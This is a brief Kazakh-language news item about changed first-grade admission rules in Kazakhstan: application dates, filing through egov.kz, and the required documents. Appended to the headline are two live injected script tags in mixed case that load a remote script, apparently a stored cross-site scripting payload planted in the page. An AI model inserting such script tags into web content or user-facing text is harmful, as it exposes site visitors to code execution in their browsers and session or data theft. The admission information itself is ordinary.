Қазақстанда бірінші сыныпқа қабылдау ережелері өзгерді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
02.04.2021
Қазақстан Республикасында бірінші сыныпқа құжаттар қабылдау 1 сәуірден басталып 1 тамызға дейін жалғасады.
Бұл ата-аналарға мектеп таңдауда алдын-ала шешім қабылдауға, қажетті құжаттарды уақытында тапсыруға және оқу құралдарын жинауға мүмкіндік береді.
Мектеп басшылығы алдын-ала сыныптарды толықтырып, қажетті оқулықтарды сатып алып, сағаттарды үлестіріп, мұғалімдер құрамын анықтай алады.
Өтінішті egov.kz.арқылы беруге болады. Ол үшін келесі құжаттар қажет:
- Ата-аналары немесе асыраушыларынан өтініш;
- Баланың туу туралы куәлігінің көшірмесі;
- 026/у-3 формасы бойынша денсаулығы туралы құжат — «Баланың денсаулық паспрорты»;
- 063/у формасы бойынша баланың денсаулығы туралы құжат;
- 3х4 екі фотосурет.
Өтініш бір жұмыс күн қаралады.
Просмотров: 774